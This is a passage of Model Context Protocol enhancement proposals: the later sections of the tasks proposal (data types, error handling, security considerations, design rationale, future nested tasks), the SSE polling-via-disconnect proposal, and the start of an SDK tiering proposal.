5. Requestors **MAY** send `notifications/cancelled` at any time during task execution, including when the task is in `input_required` status. If a task is cancelled while in `input_required` status, receivers **SHOULD** also disregard any pending responses to associated requests.
6. Because notifications do not provide confirmation of receipt, requestors **SHOULD** continue to poll with `tasks/get` after sending a cancellation notification to confirm the task has transitioned to `cancelled` status. If the task does not transition to `cancelled` within a reasonable timeframe, requestors **MAY** assume the cancellation was not processed.
#### 4.9. Task Listing
1. Receivers **SHOULD** use cursor-based pagination to limit the number of tasks returned in a single response.
2. Receivers **MUST** include a `nextCursor` in the response if more tasks are available.
3. Requestors **MUST** treat cursors as opaque tokens and not attempt to parse or modify them.
4. If a task is retrievable via `tasks/get` for a requestor, it **MUST** be retrievable via `tasks/list` for that requestor.
#### 4.10 Task Deletion
1. Receivers **MAY** accept or reject delete requests for any task at their discretion.
2. If a receiver accepts a delete request, it **SHOULD** delete the task and all associated results and metadata.
3. Receivers **MAY** choose not to support deletion at all, or only support deletion for tasks in certain statuses (e.g., only terminal statuses).
4. Requestors **SHOULD** delete tasks containing sensitive data promptly rather than relying solely on `keepAlive` expiration for cleanup.
### 5. Message Flow
[https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686#issuecomment-3452378176](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1686#issuecomment-3452378176)
### 6. Data Types
#### Task
A task represents the execution state of a request. The task metadata includes:
* `taskId`: Unique identifier for the task
* `keepAlive`: Time in milliseconds that results will be kept available after completion
* `pollFrequency`: Suggested time in milliseconds between status checks
* `status`: Current state of the task execution
#### Task Status
Tasks can be in one of the following states:
* `submitted`: The request has been received and queued for execution
* `working`: The request is currently being processed
* `input_required`: The request is waiting on additional input from the requestor
* `completed`: The request completed successfully and results are available
* `failed`: The task lifecycle itself encountered an error, unrelated to the associated request logic
* `cancelled`: The request was cancelled before completion
* `unknown`: A terminal fallback state for unexpected error conditions when the receiver cannot determine the actual task state
#### Task Metadata
When augmenting a request with task execution, the `modelcontextprotocol.io/task` key is included in `_meta`:
```json theme={null}
{
"modelcontextprotocol.io/task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"keepAlive": 60000
}
}
```
Fields:
* `taskId` (string, required): Client-generated unique identifier for the task
* `keepAlive` (number, optional): Requested duration in milliseconds to retain results after completion
#### Task Creation Notification
When a receiver creates a task, it sends a `notifications/tasks/created` notification to signal that the task is ready for polling. The notification has empty params, with the task ID conveyed through the `modelcontextprotocol.io/related-task` metadata key:
```json theme={null}
{
"jsonrpc": "2.0",
"method": "notifications/tasks/created",
"params": {
"_meta": {
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
}
}
```
This notification enables requestors to begin polling without encountering race conditions where the task might not yet exist on the receiver.
#### Task Get Request
The `tasks/get` request retrieves the current state of a task:
```typescript theme={null}
{
taskId: string; // The task identifier to query
}
```
#### Task Get Response
The `tasks/get` response includes:
```typescript theme={null}
{
taskId: string; // The task identifier
status: TaskStatus; // Current task state
keepAlive: number | null; // Actual retention duration in milliseconds, null for unlimited
pollFrequency?: number; // Suggested polling interval in milliseconds
error?: string; // Error message if status is "failed"
}
```
#### Task Result Request
The `tasks/result` request retrieves the result of a completed task:
```typescript theme={null}
{
taskId: string; // The task identifier to retrieve results for
}
```
#### Task Result Response
The `tasks/result` response returns the original result that would have been returned by the request:
```typescript theme={null}
{
// The structure matches the result type of the original request
// For example, a tools/call task would return CallToolResult structure
[key: string]: unknown;
}
```
The result structure depends on the original request type. The receiver returns the same result structure that would have been returned if the request had been executed without task augmentation.
#### Task List Request
The `tasks/list` request retrieves a list of tasks:
```typescript theme={null}
{
cursor?: string; // Optional cursor for pagination
}
```
#### Task List Response
The `tasks/list` response includes:
```typescript theme={null}
{
tasks: Array<{
taskId: string; // The task identifier
status: TaskStatus; // Current task state
keepAlive: number | null; // Retention duration in milliseconds, null for unlimited
pollFrequency?: number; // Suggested polling interval in milliseconds
error?: string; // Error message if status is "failed"
}>;
nextCursor?: string; // Cursor for next page, absent if no more results
}
```
#### Related Task Metadata
All requests, responses, and notifications associated with a task **MUST** include the `modelcontextprotocol.io/related-task` key in `_meta`:
```json theme={null}
{
"modelcontextprotocol.io/related-task": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
This associates messages with their originating task across the entire request lifecycle.
### 7. Error Handling
Tasks use two error reporting mechanisms:
1. **Protocol Errors**: Standard JSON-RPC errors for protocol-level issues
2. **Task Execution Errors**: Errors in the underlying request execution, reported through task status
#### 7.1. Protocol Errors
Receivers **MUST** return standard JSON-RPC errors for the following protocol error cases:
* Invalid or nonexistent `taskId` in `tasks/get`, `tasks/list`, or `tasks/result`: `-32602` (Invalid params)
* Invalid or nonexistent cursor in `tasks/list`: `-32602` (Invalid params)
* Request with a `taskId` that was already used for a different task (if the receiver validates task ID uniqueness): `-32602` (Invalid params)
* Attempting to retrieve result when task is not in `completed` status: `-32602` (Invalid params)
* Internal errors: `-32603` (Internal error)
Receivers **SHOULD** provide informative error messages to describe the cause of errors.
**Example: Task not found**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 70,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task not found"
}
}
```
**Example: Task expired**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 71,
"error": {
"code": -32602,
"message": "Failed to retrieve task: Task has expired"
}
}
```
> NOTE: Receivers are not obligated to retain task metadata indefinitely. It is compliant behavior for a receiver to return a "not-found" error if it has purged an expired task.
**Example: Result requested for incomplete task**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 72,
"error": {
"code": -32602,
"message": "Cannot retrieve result: Task status is 'working', not 'completed'"
}
}
```
**Example: Duplicate task ID (if receiver validates uniqueness)**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 73,
"error": {
"code": -32602,
"message": "Task ID already exists: 786512e2-9e0d-44bd-8f29-789f320fe840"
}
}
```
#### 7.2. Task Execution Errors
When the underlying request fails during execution, the task moves to the `failed` status. The `tasks/get` response **SHOULD** include an `error` field with details about the failure:
```typescript theme={null}
{
taskId: string;
status: "failed";
keepAlive: number | null;
pollFrequency?: number;
error?: string; // Description of what went wrong
}
```
**Example: Task with execution error**
```json theme={null}
{
"jsonrpc": "2.0",
"id": 4,
"result": {
"taskId": "786512e2-9e0d-44bd-8f29-789f320fe840",
"status": "failed",
"keepAlive": 30000,
"error": "Tool execution failed: API rate limit exceeded"
}
}
```
For tasks that wrap requests with their own error semantics (like `tools/call` with `isError: true`), the task should still reach `completed` status, and the error information is conveyed through the result structure of the original request type.
### 8. Security Considerations
#### 8.1. Task Isolation and Access Control
1. Receivers **SHOULD** scope task IDs to prevent unauthorized access:
1. Bind tasks to the session that created them (if sessions are supported)
2. Bind tasks to the authentication context (if authentication is used)
3. Reject `tasks/get`, `tasks/list`, or `tasks/result` requests for tasks from different sessions or auth contexts
2. Receivers that do not implement session or authentication binding **SHOULD** document this limitation clearly, as task results may be accessible to any requestor that can guess the task ID.
3. Receivers **SHOULD** implement rate limiting on:
1. Task creation to prevent resource exhaustion
2. Task status polling to prevent denial of service
3. Task result retrieval attempts
4. Task listing requests to prevent denial of service
#### 8.2. Resource Management
> WARNING: Task results may persist longer than the original request execution time. For sensitive operations, requestors should carefully consider the security implications of extended result retention and may want to retrieve results promptly and request shorter `keepAlive` durations.
1. Receivers **SHOULD**:
1. Enforce limits on concurrent tasks per requestor
2. Enforce maximum `keepAlive` durations to prevent indefinite resource retention
3. Clean up expired tasks promptly to free resources
2. Receivers **SHOULD**:
1. Document maximum supported `keepAlive` duration
2. Document maximum concurrent tasks per requestor
3. Implement monitoring and alerting for resource usage
#### 8.3. Audit and Logging
1. Receivers **SHOULD**:
1. Log task creation, completion, and retrieval events for audit purposes
2. Include session/auth context in logs when available
3. Monitor for suspicious patterns (e.g., many failed task lookups, excessive polling)
2. Requestors **SHOULD**:
1. Log task lifecycle events for debugging and audit purposes
2. Track task IDs and their associated operations
## Rationale
### Design Decision: Generic Task Primitive
The decision to implement tasks as a generic request augmentation mechanism (rather than tool-specific or method-specific) was made to maximize protocol simplicity and flexibility.
Tasks are designed to work with any request type in the MCP protocol, not just tool calls. This means that `resources/read`, `prompts/get`, `sampling/createMessage`, and any future request types can all be augmented with task metadata. This approach provides significant benefits over a tool-specific design.
From a protocol perspective, this design eliminates the need for separate task implementations per request type. Instead of defining different async patterns for tools versus resources versus prompts, a single set of task management methods (`tasks/get` and `tasks/result`) works uniformly across all request types. This uniformity reduces cognitive load for implementers and creates a consistent experience for applications using the protocol.
The generic design also provides implementation flexibility. Servers can choose which requests support task augmentation without requiring protocol changes or version negotiation. If a server doesn't support tasks for a particular request type, it simply ignores the task metadata and processes the request normally. This allows servers to add task support to requests incrementally, starting with high-value operations and expanding over time based on actual usage patterns.
Architecturally, tasks are treated as metadata rather than a separate execution model. They augment existing requests rather than replacing them. The original request/response flow remains intact—the request still gets a response eventually. Tasks simply provide an additional polling-based mechanism for result retrieval. This design ensures that related messages (such as elicitations during task execution) can be associated consistently via the `modelcontextprotocol.io/related-task` metadata key, regardless of the underlying request type.
### Design Decision: Metadata-Based Augmentation
Using `_meta` for task information rather than dedicated request parameters was chosen to maintain a clear separation of concerns between request semantics and execution tracking.
Task information is fundamentally orthogonal to request semantics. The task ID and keepAlive duration don't affect what the request does—they only affect how the result is retrieved and retained. A `tools/call` request performs the same operation whether or not it includes task metadata. The task metadata simply provides an alternative mechanism for accessing the result.
By placing task information in `_meta`, we create a clear architectural boundary between "what to execute" (request parameters) and "how to track execution" (task metadata). This boundary makes it easier for implementers to reason about the protocol. Request parameters define the operation being performed, while metadata provides orthogonal concerns like progress tracking, task management, and other execution-related information.
This approach also provides natural backward compatibility. Servers that don't support tasks can ignore the `_meta` content without breaking request processing. The request parameters remain valid and complete, so the operation can proceed normally. This means no protocol version negotiation is required—the new functionality is purely additive and non-disruptive.
SDKs can provide ergonomic abstractions over the task primitive while maintaining the separation of concerns, for example:
```typescript theme={null}
// === MCP SDK (Pseudocode based loosely on modelcontextprotocol/typescript-sdk) ===
/**
* NEW: A request that resolves to a result, either directly or by polling a task.
*/
class PendingRequest {
constructor(readonly protocol: Protocol, readonly result: Promise, readonly taskId?: string) {}
/**
* Waits for a result, calling onTaskStatus if provided and a task was created.
*/
async result({ onTaskStatus }): Promise => {
if (!onTaskStatus || !this.taskId) {
// No task listener or task ID provided, just block for the result
return await result;
}
// Whichever is successful first (or a failure if all fail) is returned.
return Promise.any([
result, // Blocks for result
(async () => {
// Blocks for a notifications/tasks/created with the provided task ID
await this.protocol.waitForTask(this.taskId);
return await taskHandler(this.taskId);
})(),
]);
}
/**
* Encapsulates polling for a result, calling onTaskStatus after querying the task.
*/
private async taskHandler({ onTaskStatus }): Promise => {
// Poll for completion
let task: Task;
do {
task = await this.protocol.getTask(this.taskId);
await onTaskStatus(task);
await sleep(task.pollFrequency ?? DEFAULT_POLLING_INTERNAL);
} while (!task.isTerminal());
// Process result
return await this.protocol.getTaskResult(this.taskId);
}
}
/**
* Simplified/partial client session implementation for illustration purposes.
* Extends a base class it shares with the server.
*/
class Client extends Protocol {
/**
* Existing request method, but with most implementation refactored to beginCallTool
*/
async callTool(
params: CallToolRequest['params'],
resultSchema: Schema,
) {
// Existing request methods can be changed to reuse new methods exposed for
// separating request/response flows.
const request = await this.beginCallTool(params, resultSchema);
return request.result();
}
/**
* NEW: Low-level method that starts a tool call and returns a PendingRequest
* object for more granular control.
*/
async beginCallTool(
params: CallToolRequest['params'],
resultSchema: Schema,
) {
const request = await this.beginRequest({ method: 'tools/call', params }, resultSchema, options);
return request;
}
}
// === HOST APPLICATION ===
// Begin a tool call with task support
const pending: PendingRequest = await client.beginCallTool(
{
name: "analyze_dataset",
arguments: { dataset: "large_file.csv" },
},
CallToolResultSchema,
{
keepAlive: 3600000,
},
);
// Client code can assume tasks are supported, and the fallback case can be handled internally
const result = await pending.result({
onTaskStatus: async (task) => {
await sendLatestStateSomewhere(task);
},
});
```
As the design does not alter the basic request semantics, the existing form would continue to work as well:
```typescript theme={null}
const result = await client.callTool(
{
name: "analyze_dataset",
arguments: { dataset: "large_file.csv" },
},
CallToolResultSchema,
);
```
### Design Decision: Client-Generated Task IDs
The choice to have clients generate task IDs rather than having servers assign them provides several critical benefits:
**Idempotency and Fault Tolerance:**
The primary benefit is enabling idempotent task creation. When a client generates the task ID, it can safely retry a task-augmented request if it doesn't receive a response, knowing that the server will recognize the duplicate task ID and return an error. This is essential for reliable operation over unreliable networks:
* If a request times out, the client can safely retry without creating duplicate tasks
* If a connection drops before the response arrives, the client can reconnect and retry
* The server validates task ID uniqueness and returns an error for duplicates, confirming whether the task was created
With server-generated task IDs, a timeout or connection failure creates uncertainty—the client doesn't know whether the task was created, and has no safe way to retry without potentially creating duplicate tasks.
**Simplicity for Clients:**
Client-generated task IDs simplify the client's implementation by eliminating the need to correlate the initial response with a task identifier. The client can immediately begin polling for task status using the task ID it generated, without needing to parse the response to extract a server-assigned identifier. This is particularly valuable for asynchronous programming models where the client may want to store the task ID before the response arrives.
**Trade-offs for Servers:**
The main trade-off is that servers wrapping existing workflow systems with their own task identifiers will generally handle this by maintaining a mapping between the client-provided task IDs and the underlying system's identifiers. For example, an MCP server wrapping AWS Step Functions might receive a client-generated task ID like `"client-abc-123"` and need to track that it corresponds to Step Functions execution ARN `"arn:aws:states:...:exec-xyz"`.
This requires:
* Persistent storage for the task ID mapping (typically a simple key-value store)
* Maintaining the mapping for the task's keepAlive duration
* Handling mapping lookups for task status and result retrieval
However, this complexity is typically minor compared to the overall work of integrating an existing workflow system into MCP. Most workflow systems already require state management for tracking execution, and maintaining a task ID mapping is a straightforward addition. The mapping structure is simple (client task ID maps to an internal identifier), and can be implemented using existing databases or key-value stores such a server likely already uses for other state management.
### Design Decision: Task Creation Notification
The decision to use a `notifications/tasks/created` notification rather than altering the response semantics (as #1391 proposed) acknowledges the asynchronous nature of task creation and enables efficient race patterns between task-based polling and traditional request/response flows.
When a server creates a task, it must signal to the client that the task is ready for polling. There are at least two possible approaches: (1) the initial request could return synchronously with task metadata, or (2) the server could send a notification. This proposal uses notifications for several key reasons:
1. Notifications enable fire-and-forget request processing. The server can accept the request, begin processing it, and send the notification once the task is created, without needing to block the initial request/response cycle. This is particularly important for servers that dispatch work to background systems or queues—they can acknowledge the request immediately and send the notification once the background system confirms task creation.
2. Notifications support the race pattern that enables graceful degradation. Clients can race between waiting for the original request's response and waiting for the `notifications/tasks/created` notification. If the server doesn't support tasks, no notification arrives and the original response wins. If the server does support tasks, the notification typically arrives first (or approximately simultaneously), enabling polling to begin. A synchronous response would force clients to wait for the response before knowing whether to poll or not.
3. Notifications avoid ambiguity with existing protocol semantics. If the initial request response included task metadata and the client then polled for results, it would change the implied meaning of existing notification types:
1. **Progress notifications**: The current MCP specification requires that progress notifications reference tokens that "are associated with an in-progress operation." While "operation" is not formally defined, the implied understanding is that an operation is bounded by a request/response pair—progress notifications stop when the response is sent. With a synchronous response containing task metadata, progress notifications would need to continue while the task executes, expanding the implied meaning of "operation" to include asynchronous tasks that outlive the original request/response cycle. The notification-based approach avoids this semantic expansion by keeping progress notifications tied to the initial request's lifecycle, while future task-based progress can be cleanly associated via `modelcontextprotocol.io/related-task` metadata. We recommend that a future SEP clarify the definition of "operation" in the progress specification.
2. **Cancellation semantics**: With the notification-based approach, `notifications/cancelled` clearly targets the original request ID and causes the associated task to move to `cancelled` status, maintaining a clean separation between request cancellation and task lifecycle management.
While the notification is required by the specification for servers that create tasks, there are edge cases where it may be unavailable:
* **sHTTP without stream support**: In environments where either the client or the server does not support SSE streams, notifications cannot be delivered. In such cases, clients may choose to proactively poll with `tasks/get` using exponential backoff, though this is nonstandard and may result in unnecessary polling attempts if the server doesn't support tasks.
* **Degraded connection scenarios**: If the notification is lost in transit, clients should implement reasonable timeout behavior and fall back to the original response.
The standard and recommended approach is to wait for the `notifications/tasks/created` notification before beginning polling. Proactive polling without waiting for the notification should be considered a fallback mechanism for constrained environments only.
### Design Decision: No Capabilities Declaration
Unlike other protocol features such as tools, resources, and prompts, tasks do not require capability negotiation. This decision was made to enable graceful degradation and per-request flexibility.
Task support can be determined implicitly through usage rather than explicitly through capability declarations. When a client sends a task-augmented request, the server will process it according to its capabilities. If the server doesn't support tasks for that request type, it simply ignores the task metadata and returns the result normally through the original request/response flow. The client can then detect the lack of task support by attempting to call `tasks/get` and handling any errors that result.
This approach eliminates the need for complex handshakes or feature detection protocols. Clients can optimistically try task augmentation and gracefully fall back to direct response handling if needed. This makes the protocol more resilient and easier to implement.
Additionally, this design provides per-request flexibility that would be difficult to express through capabilities. A server might support tasks on some request types but not others, or support might vary based on runtime conditions such as resource availability or load. Requiring granular capability declarations per request type would significantly complicate the protocol without providing substantial benefits. The implicit detection model is simpler and more flexible.
### Alternative Designs Considered
**Tool-Specific Async Execution:**
An earlier version of this proposal (#1391) focused specifically on tool calls, introducing an `invocationMode` field on tool definitions to mark tools as supporting synchronous, asynchronous, or both execution modes. This approach would have added dedicated fields to the tool call request and response structures, with server-side capability declarations to indicate support for async tool execution.
While this design would have addressed the immediate need for long-running tool calls, it was rejected in favor of the more general task primitive for several reasons. First, it artificially limited the async execution pattern to tools when other request types have similar needs. Resources can be expensive to read, prompts can require complex processing, and sampling requests may involve lengthy user interactions. Creating separate async patterns for each request type would lead to protocol fragmentation and inconsistent implementation patterns.
Second, the tool-specific approach required more complex capability negotiation and version handling. Servers would need to filter tool lists based on client capabilities, and SDKs would need to manage different invocation patterns for sync versus async tools. This complexity would ripple through every layer of the implementation stack.
Finally, the tool-specific design didn't address the broader architectural need for deferred result retrieval across all MCP request types. By generalizing to a task primitive that augments any request, this proposal provides a consistent pattern that can be applied uniformly across the protocol. More importantly, this foundation is extensible to future protocol messages and features such as subtasks, making it a more appropriate building block for the protocol's evolution.
**Transport-Layer Solutions:**
An alternative approach would be to solve for this purely at the transport layer, without introducing a new data-layer primitive. Several proposals (#1335, #1442, #1597) address transport-specific concerns such as connection resilience, request retry semantics, and stream management for sHTTP. These are valuable improvements that can mitigate many scaling and reliability challenges associated with requests that may take extended time to complete.
However, transport-layer solutions alone are insufficient for the use cases this SEP addresses. Even with perfect transport-layer reliability, several data-layer concerns remain:
First, servers and clients need a way to communicate expectations about execution patterns. Without this, host applications cannot make informed decisions about UX patterns—should they block, show a spinner, or allow the user to continue working? An annotation alone could signal that a request might take extended time, but provides no mechanism to actively check status or retrieve results later.
Second, transport-layer solutions cannot provide visibility into the execution state of a request that is still in progress. If a request stops sending progress notifications, the client cannot distinguish between "the server is doing expensive work" and "the request was lost." Transport-level retries can confirm the connection is alive, but cannot answer "is this specific request still executing?" This visibility is critical for operations where users need confidence their work is progressing.
Third, different transports would require different mechanisms for these concerns. The sHTTP proposals adjust stream management and retry semantics to fulfill these requirements, but stdio has no equivalent extension points. This creates transport-specific fragmentation where implementers must solve the same problems differently depending on their choice of transport. Data-layer operations provides consistent semantics across all transports.
Finally, deferred result retrieval and active status checks are data-layer concerns that cannot be addressed by transport improvements alone. The ability to retrieve a result multiple times, specify retention duration, and handle cleanup is orthogonal to how the underlying messages are delivered.
**Resource-Based Approaches:**
Another possible approach would be to leverage existing MCP resources for tracking long-running operations. For example, a tool could return a linked resource that communicates operation status, and clients could subscribe to that resource to receive updates when the operation completes. This would allow servers to represent task state using the resource primitive, potentially with annotations for suggested polling frequency.
While this approach is technically feasible and servers remain free to adopt such conventions, it suffers from similar limitations as the tool-splitting pattern described in the Motivation section. Like the `start_tool` and `get_tool` convention, a resource-based tracking system would be convention-based rather than standardized, creating several challenges:
The most fundamental issue is the lack of a consistent way for clients to distinguish between ordinary resources (meant to be exposed to models) and status-tracking resources (meant to be polled by the application). Should a status resource be presented to the model? How should the client correlate a returned resource with the original tool call? Without standardization, different servers would implement different conventions, forcing clients/hosts/models to handle each server's particular approach. Extending resources with task-like semantics (such as polling frequency, keepalive durations, and explicit status states) would create a new and distinct purpose for resources that would be difficult to distinguish from their existing purpose as model-accessible content.
The resource subscription model has one additional issue: as it is push-based, it requires clients to wait for notifications of resource changes rather than actively polling for status. While this works for some use cases, it doesn't address scenarios where clients need to actively check status—for example, proactively and deterministically checking if work is still progressing, which is the original intent of this proposal.
The task primitive addresses these concerns by providing a standardized, protocol-level mechanism specifically designed for this use case, with consistent semantics that any client can leverage without host applications needing to understand server-specific conventions. While resource-based tracking remains possible for servers that prefer it and/or are already using it, this SEP provides a first-class alternative that solves the broader set of requirements identified previously.
### Backward Compatibility
This SEP introduces **no backward incompatibilities**. All existing MCP functionality remains unchanged:
**Compatibility Guarantees:**
* Existing requests work identically with or without task metadata
* Servers that don't understand tasks process requests normally
* No protocol version negotiation required
* No capability declarations needed
**Graceful Degradation:**
* Clients race between waiting for the original request's response and waiting for the `notifications/tasks/created` notification followed by polling
* Whichever completes first (original response or task-based retrieval) is used by the client
* If a server doesn't support tasks, no `notifications/tasks/created` is sent, and the original request's response is used
* If a server supports tasks, the `notifications/tasks/created` notification is sent, enabling the client to begin polling for results
* This race pattern ensures graceful degradation without requiring capability negotiation or version detection
* Partial support is possible—servers can support tasks on some requests but not others
**Adoption Path:**
* Servers can implement task support incrementally, starting with high-value request types
* Clients can opportunistically use tasks where supported
* No coordination required between client and server updates
## Future Work
The task primitive introduced in this SEP provides a foundation for several important extensions that will enhance MCP's workflow capabilities.
### Push Notifications
While this SEP focuses on client-driven polling, future work could introduce server-initiated notifications for task state changes. This would be particularly valuable for operations that take hours or longer, where continuous polling becomes impractical.
A notification-based approach would allow servers to proactively inform clients when:
* A task completes or fails
* A task reaches a milestone or significant state transition
* A task requires input (complementing the `input_required` status)
This could be implemented through webhook-style mechanisms or persistent notification channels, depending on the transport capabilities. The proposed task ID and status model provides the necessary infrastructure for servers to identify which tasks warrant notifications and for clients to correlate notifications with their outstanding tasks.
### Intermediate Results
The current task model returns results only upon completion. Future extensions could enable tasks to report intermediate results or progress artifacts during execution. This would support use cases where servers can produce partial outputs before final completion, such as:
* Streaming analysis results as they become available
* Reporting completed phases of multi-step operations
* Providing preview data while full processing continues
Intermediate results would build on the proposed task ID association mechanism, allowing servers to send multiple result notifications or response messages tied to the same task ID throughout its lifecycle.
### Nested Task Execution
A significant future enhancement is support for hierarchical task relationships, where a task can spawn subtasks as part of its execution. This would enable complex, multi-step workflows orchestrated by the server.
In a nested task model, a server could:
* Create subtasks in response to a parent task reaching a state that requires additional operations
* Communicate subtask requirements to the client, potentially including required tool calls or sampling requests
* Track subtask completion and use subtask results to advance the parent task
* Maintain provenance through task ID hierarchies, showing the relationship between parent and child tasks
For example, a complex analysis task might spawn several subtasks for data gathering, each represented by its own task ID but associated with the parent task. The parent task would remain in a pending state (potentially in a new `tool_required` status) until all required subtasks complete.
This hierarchical model would support sophisticated server-controlled workflows while maintaining the client's ability to monitor and retrieve results at any level of the task tree.
Example nested task flow
```mermaid theme={null}
sequenceDiagram
participant C as Client
participant S as Server
Note over C,S: Client Creates Parent Task
C->>S: tools/call "deploy_application" _meta: {taskId: "deploy-123"}
S--)C: notifications/tasks/created
C->>S: tasks/get (taskId: "deploy-123")
S->>C: status: working
Note over S: Server determines subtasks needed
Note over C,S: Server Responds with Subtask Requirements
C->>S: tasks/get (taskId: "deploy-123")
S->>C: status: working childTasks: [{ taskId: "build-456", toolName: "run_build", arguments: {...} }, { taskId: "test-789", toolName: "run_tests", arguments: {...} }]
Note over C: Client initiates subtasks
C->>S: tools/call "run_build" _meta: {taskId: "build-456", parentTaskId: "deploy-123"}
S--)C: notifications/tasks/created
C->>S: tools/call "run_tests" _meta: {taskId: "test-789", parentTaskId: "deploy-123"}
S--)C: notifications/tasks/created
Note over C: Client polls subtasks
C->>S: tasks/get (taskId: "build-456")
S->>C: status: completed
C->>S: tasks/get (taskId: "test-789")
S->>C: status: completed
Note over S: All subtasks complete, parent continues
C->>S: tasks/get (taskId: "deploy-123")
S->>C: status: completed
C->>S: tasks/result (taskId: "deploy-123")
S->>C: Deployment complete
```
**Potential Data Model Extensions:**
The task status response could be extended to include parent and child task relationships:
```typescript theme={null}
{
taskId: string;
status: TaskStatus;
keepAlive: number | null;
pollFrequency?: number;
error?: string;
// Extensions for nested tasks
parentTaskId?: string; // ID of parent task, if this is a subtask
childTasks?: Array<{ // Subtasks required by this task
taskId: string; // Pre-generated task ID for the subtask
toolName: string; // Tool to call for this subtask
arguments?: object; // Arguments for the tool call
}>;
}
```
This would allow clients to:
* Discover subtasks required by a parent task through the `childTasks` array
* Initiate the required subtask tool calls using the pre-generated task IDs and provided arguments
* Navigate the task hierarchy by following parent/child relationships via `parentTaskId`
* Monitor all subtasks by polling each child task ID
* Wait for all subtasks to complete before checking parent task completion
The existing task metadata and status lifecycle are designed to be forward-compatible with these extensions.
# SEP-1699: Support SSE polling via server-side disconnect
Source: https://modelcontextprotocol.io/community/seps/1699-support-sse-polling-via-server-side-disconnect
Support SSE polling via server-side disconnect
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1699 |
| **Title** | Support SSE polling via server-side disconnect |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-22 |
| **Author(s)** | Jonathan Hefner ([@jonathanhefner](https://github.com/jonathanhefner)) |
| **Sponsor** | None |
| **PR** | [#1699](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1699) |
***
## Abstract
This SEP proposes changes to the Streamable HTTP transport in order to mitigate issues regarding long-running connections and resumability.
## Motivation
The Streamable HTTP transport spec [does not allow](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/04c6e1f0ea6544c7df307fb2d7c637efe34f58d3/docs/specification/draft/basic/transports.mdx?plain=1#L109-L111) servers to close a connection while computing a result. In other words, barring client-side disconnection, servers must maintain potentially long-running connections.
## Specification
When a server starts an SSE stream, it MUST immediately send an SSE event consisting of an [`id`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22id%22) and an empty [`data`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22data%22) string in order to prime the client to reconnect with that event ID as the `Last-Event-ID`.
Note that the SSE standard explicitly [permits setting `data` to an empty string](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=data%20buffer%20is%20an%20empty%20string), and says that the appropriate client-side handling is to record the `id` for `Last-Event-ID` but otherwise ignore the event (i.e., not call the event handler callback).
At any point after the server has sent an event ID to the client, the server MAY disconnect at will. Specifically, [this part of the MCP spec](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/04c6e1f0ea6544c7df307fb2d7c637efe34f58d3/docs/specification/draft/basic/transports.mdx?plain=1#L109-L111) will be changed from:
> The server **SHOULD NOT** close the SSE stream before sending the JSON-RPC *response* for the received JSON-RPC *request*
To:
> The server **MAY** close the connection before sending the JSON-RPC *response* if it has sent an SSE event with an event ID to the client
If a server disconnects, the client will interpret the disconnection the same as a network failure, and will attempt to reconnect. In order to prevent clients from reconnecting / polling excessively, the server SHOULD send an SSE event with a [`retry`](https://html.spec.whatwg.org/multipage/server-sent-events.html#:~:text=field%20name%20is%20%22retry%22) field indicating how long the client should wait before reconnecting. Clients MUST respect the `retry` field.
## Rationale
Servers may disconnect at will, avoiding long-running connections. Sending a `retry` field will prevent the client from hammering the server with inappropriate reconnection attempts.
## Backward Compatibility
* **New Client + Old Server**: No changes. No backward incompatibility.
* **Old Client + New Server**: Client should interpret an at-will disconnect the same as a network failure. `retry` field is part of the SSE standard. No backward incompatibility if client already implements proper SSE resuming logic.
## Additional Information
This SEP supersedes (in part) [SEP-1335](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1335).
# SEP-1730: SDKs Tiering System
Source: https://modelcontextprotocol.io/community/seps/1730-sdks-tiering-system
SDKs Tiering System
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 1730 |
| **Title** | SDKs Tiering System |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-10-29 |
| **Author(s)** | Inna Harper, Felix Weinberger |
| **Sponsor** | None |
| **PR** | [#1730](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1730) |
***
## Abstract
This SEP proposes a tiering system for Model Context Protocol (MCP) SDKs to establish clear expectations for feature support, maintenance commitments, and quality standards. The system defines three tiers of SDK support with objective, measurable criteria for classification.
## Motivation
The MCP ecosystem needs SDK harmonization to help users make informed decisions. Users currently face challenges:
* **Feature Support Uncertainty**: No standardized way to know which SDKs support specific MCP features (OAuth, client/server/system features, like sampling, transports)
* **Maintenance Expectations**: Unclear commitment levels for bug fixes, security patches, and feature updates
* **Implementation Timelines**: No visibility into when SDKs will support new protocol versions and features
## Specification
### Tier Definitions
#### Tier 1: fully supported
SDKs in this tier provides full protocol implementation and is well supported
**Requirements:**
* **Feature complete and full support of the protocol**
* All conformance tests pass
* New protocol features before the new spec version release. (There is two week window between Release Candidate and the new protocol version release)
* **SDK maintenance**
* Acknowledge and triage issues within two business days
* Resolve security and critical bugs within seven days
* Stable release and SDK versioning clearly documented
* **Documentation**
* Comprehensive documentation with examples for all features
* Published dependency update policy
#### Tier 2: commitment to be fully supported
SDKs with established implementations actively working toward full protocol support.
**Requirements:**
* **Feature complete and full support of the protocol**
* 80% of conformance tests pass
* New protocol features implemented within six months
* **SDK maintenance**
* Active issue tracking and management
* At least one stable release
* **Documentation**
* Basic documentation covering core features
* Published dependency update policy
* **Commitment to move to Tier1**
* Published roadmap showing intent to achieve Tier 1 or, if SDK will remain in Tier 2 indefinitely, a transparent roadmap about the direction of the SDK and reasons for not being feature complete
#### Tier 3: Experimental
Early-stage or specialized SDKs exploring the protocol space.
**Characteristics:**
* No feature completeness guarantees
